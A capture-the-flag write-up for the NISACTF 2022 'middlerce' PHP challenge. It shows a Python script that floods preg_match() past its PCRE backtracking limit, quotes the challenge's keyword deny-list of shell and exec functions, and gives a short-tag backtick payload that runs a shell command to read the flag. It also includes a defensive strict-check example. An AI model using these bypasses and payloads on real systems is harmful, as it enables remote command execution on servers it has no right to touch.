NSS [NISACTF 2022]middlerce
When opening the challenge, the source code is given directly:

```php
$command = json_decode($txw4ever,true)['cmd'];
```
From this statement we can tell that $txw4ever must be JSON-formatted data, but the preg_match() call filters it. The pattern looks for `{`, then a greedy `.*` matches the characters inside the braces, and a final `.*` ends the pattern. This seemingly impeccable filter can actually be bypassed using the PCRE backtracking limit.
To prevent regular expression denial of service (ReDoS), PHP puts an upper bound on the number of PCRE backtracking steps, pcre.backtrack_limit, which defaults to 1000000. If a match exceeds 1000000 steps, preg_match() returns neither 1 nor 0 but false, meaning the limit was exceeded.
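The root cause is that preg_match() has three outcomes, not two. As an added example (not the challenge's source), here is the loose check that lets a backtracking error pass as "clean input" beside a strict one that only accepts an explicit 0; the pattern is a constructed stand-in for the real filter, and the lowered pcre.backtrack_limit is constructed so a small subject hits the limit in place of the 1000000-character payload.

```php
<?php
// Added example, not the challenge's source. FILTER_PATTERN is a constructed
// stand-in: the writeup only says the real regex contains '{' and greedy '.*'.
const FILTER_PATTERN = '/\{.*\}X/s';

// Loose check: preg_match() returns 1 (match), 0 (no match) or false (error).
// `if (preg_match(...))` treats false like 0, so a PCRE error and a clean
// input are indistinguishable here.
function checkLoose(string $input): bool
{
    if (preg_match(FILTER_PATTERN, $input)) {
        return false;   // rejected: the pattern matched
    }
    return true;        // accepted, including when the engine gave up
}

// Strict check: only an explicit 0 means "no match". A match (1) and an
// engine error (false, e.g. PREG_BACKTRACK_LIMIT_ERROR) both reject.
function checkStrict(string $input): bool
{
    $result = preg_match(FILTER_PATTERN, $input);
    if ($result === false) {
        error_log('preg_match() failed, preg_last_error=' . preg_last_error());
        return false;
    }
    return $result === 0;
}

// Constructed demo: disable the JIT (which does not use the interpreter's
// step counter) and shrink the backtracking budget so a 200 kB subject
// exhausts it. The greedy '.*' consumes the whole subject and then retries
// '}X' at every position on the way back, one counted step per position.
ini_set('pcre.jit', '0');
ini_set('pcre.backtrack_limit', '1000');

$short   = '{"cmd":"ls"}';                                   // constructed
$flooded = '{"cmd":"ls", "a":"' . str_repeat('#', 200000) . '"}'; // constructed

var_dump(checkLoose($short));
var_dump(checkLoose($flooded));   // error path: loose check cannot see it
var_dump(checkStrict($flooded));  // error path: strict check rejects it
```

The same rule applies to preg_replace() and friends, which return null on error: compare against the documented success value, never against truthiness.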
$_REQUEST receives both GET and POST data. Since GET is not suitable for sending very long requests, we use POST here.
Payload generation script:

```python
import requests

# 1000000 filler characters push preg_match() past pcre.backtrack_limit,
# so it returns false instead of 1 and the JSON is never rejected.
payload = '{"cmd":"cmd", "a":"' + '#' * 1000000 + '"}'
res = requests.post("http://node4.anna.nssctf.cn:28035/", data={"letter": payload})
print(res.text)
```
The script sends the request, and the response no longer contains 再加把油喔, indicating that the preg_match() check has been bypassed.
Next we need to consider how [command] can get past the checkdata() function. The regex filter in checkdata() is as follows:
```
/\^|\||\~|assert|print|include|require|\(|echo|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i
```
This challenge is a black box; you can also fuzz it yourself and you will get the same result.
The filtering is very strict, and relying on functions to execute commands will not work, so we use short tags + backticks for command execution instead.
```php
?><?= `nl /f*`?>
```
To explain: `<?= ... ?>` is equivalent to `<? echo ... ?>`. The leading `?>` of the payload closes the current PHP block, and the rest of the payload is equivalent to echo + backticks, which executes the command.
Successfully got the flag.